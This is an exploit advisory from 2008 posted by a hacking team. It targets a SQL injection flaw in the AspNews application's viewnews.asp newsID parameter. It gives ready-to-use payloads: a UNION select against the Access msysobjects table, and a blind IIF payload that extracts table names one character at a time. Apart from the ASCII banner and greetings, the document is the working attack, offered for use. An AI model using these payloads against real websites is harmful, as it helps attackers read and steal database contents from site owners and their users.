Home / os / win10

aspnews-sql.txt

Posted on 11 June 2008

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /'             __  /'__`        / \__  /'__`       /  ___    |
|  /\_,     ___   /\_/\_L     ___  ,_/ /   _ __  \__/    |
|  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__ \___``  |
|       / /    / L / \__/  \_  \_   / / L  |
|       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_   \____/ |
|       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/   /___/  |
|                   \____/ >> Kings of injection                      |
|                   /___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

[+] Script Name    : AspNews Remote SQL Injection Exploit

|+| Team           : InjEct0r5

[+] Author         : Bl@ckbe@rD ('Tunisian TerrorisT') ;

[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;

--//-->

[+] Expl0iT :

/aspnews/viewnews.asp?newsID={SQL}

{SQL} -->  8+union+select+name+from+msysobjects

Or blind it :

{SQL} -->  IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00

--//-->

[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...

 

TOP